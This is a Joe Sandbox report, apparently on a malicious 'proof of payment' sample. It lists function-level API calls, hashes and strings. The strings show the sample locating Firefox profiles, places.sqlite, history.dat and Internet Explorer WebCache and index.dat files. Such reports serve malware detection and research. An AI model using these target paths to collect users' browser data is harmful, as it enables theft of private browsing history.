                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00403FE1
                                      • memset.MSVCRT ref: 00403FF6
                                      • memset.MSVCRT ref: 0040400B
                                      • memset.MSVCRT ref: 00404020
                                      • memset.MSVCRT ref: 00404035
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                      • memset.MSVCRT ref: 004040FC
                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                      • API String ID: 3527940856-3369679110
                                      • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                      • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                      • API String ID: 3510742995-2641926074
                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                      • memset.MSVCRT ref: 004033B7
                                      • memcpy.MSVCRT ref: 004033D0
                                      • wcscmp.MSVCRT ref: 004033FC
                                      • _wcsicmp.MSVCRT ref: 00403439
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                      • String ID: $0.@
                                      • API String ID: 3030842498-1896041820
                                      • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                      • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 2941347001-0
                                      • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                      • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 00403C09
                                      • memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                      • wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                      • wcscat.MSVCRT ref: 00403C70
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcscat$Closewcscpywcslen
                                      • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                      • API String ID: 3249829328-1174173950
                                      • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                      • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                      • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                      • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040A824
                                      • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                      • wcscpy.MSVCRT ref: 0040A854
                                      • wcscat.MSVCRT ref: 0040A86A
                                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                      • String ID:
                                      • API String ID: 669240632-0
                                      • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                      • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • wcschr.MSVCRT ref: 00414458
                                      • _snwprintf.MSVCRT ref: 0041447D
                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                      • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                      • String ID: "%s"
                                      • API String ID: 1343145685-3297466227
                                      • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                      • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                      • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                      • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                      • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                      • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressHandleModuleProcProcessTimes
                                      • String ID: GetProcessTimes$kernel32.dll
                                      • API String ID: 1714573020-3385500049
                                      • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                      • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                      • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 004087D6
                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                      • memset.MSVCRT ref: 00408828
                                      • memset.MSVCRT ref: 00408840
                                      • memset.MSVCRT ref: 00408858
                                      • memset.MSVCRT ref: 00408870
                                      • memset.MSVCRT ref: 00408888
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                      • String ID:
                                      • API String ID: 2911713577-0
                                      • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                      • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                      • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                      • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memcmp
                                      • String ID: @ $SQLite format 3
                                      • API String ID: 1475443563-3708268960
                                      • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                      • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                      • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                      • memset.MSVCRT ref: 00414C87
                                      • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                      • wcscpy.MSVCRT ref: 00414CFC
                                        • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: AddressCloseProcVersionmemsetwcscpy
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                      • API String ID: 2705122986-2036018995
                                      • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                      • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                      • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                      • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: _wcsicmpqsort
                                      • String ID: /nosort$/sort
                                      • API String ID: 1579243037-1578091866
                                      • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                      • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                      • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                      • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • memset.MSVCRT ref: 0040E60F
                                      • memset.MSVCRT ref: 0040E629
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                      Strings
                                      • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                      • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                      • API String ID: 3354267031-2114579845
                                      • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                      • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                      • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                      • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                      • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                      • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                      • LockResource.KERNEL32(00000000), ref: 004148EF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Resource$FindLoadLockSizeof
                                      • String ID:
                                      • API String ID: 3473537107-0
                                      • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                      • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                      • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ??3@
                                      • String ID:
                                      • API String ID: 613200358-0
                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: only a single result allowed for a SELECT that is part of an expression
                                      • API String ID: 2221118986-1725073988
                                      • Opcode ID: 048d8ebac314828999dc99bd83d8a91ef0803223d3a13c5c6c473df875debe00
                                      • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                      • Opcode Fuzzy Hash: 048d8ebac314828999dc99bd83d8a91ef0803223d3a13c5c6c473df875debe00
                                      • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1695473243.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_400000_proof of payment.jbxd
                                      Similarity
                                      • API ID: ChangeCloseFindNotificationSleep
                                      • String ID: }A
                                      • API String ID: 1821831730-2138825249
                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ??3@DeleteObject
                                      • String ID: r!A
                                      • API String ID: 1103273653-628097481
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ??2@
                                      • String ID:
                                      • API String ID: 1033339047-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      • memcmp.MSVCRT ref: 00444BA5
                                      Similarity
                                      • API ID: AddressProc$memcmp
                                      • String ID: $$8
                                      • API String ID: 2808797137-435121686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      • duplicate column name: %s, xrefs: 004307FE
                                      • too many columns on %s, xrefs: 00430763
                                      Similarity
                                      • API ID:
                                      • String ID: duplicate column name: %s$too many columns on %s
                                      • API String ID: 0-1445880494
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                      • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                      Similarity
                                      • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                      • String ID:
                                      • API String ID: 1042154641-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                      • memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                      Similarity
                                      • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                      • String ID: history.dat$places.sqlite
                                      • API String ID: 3093078384-467022611
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                      • GetLastError.KERNEL32 ref: 00417627
                                      Similarity
                                      • API ID: ErrorLast$File$PointerRead
                                      • String ID:
                                      • API String ID: 839530781-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID: *.*$index.dat
                                      • API String ID: 1974802433-2863569691
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Similarity
                                      • API ID: ??3@mallocmemcpy
                                      • String ID:
                                      • API String ID: 3831604043-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
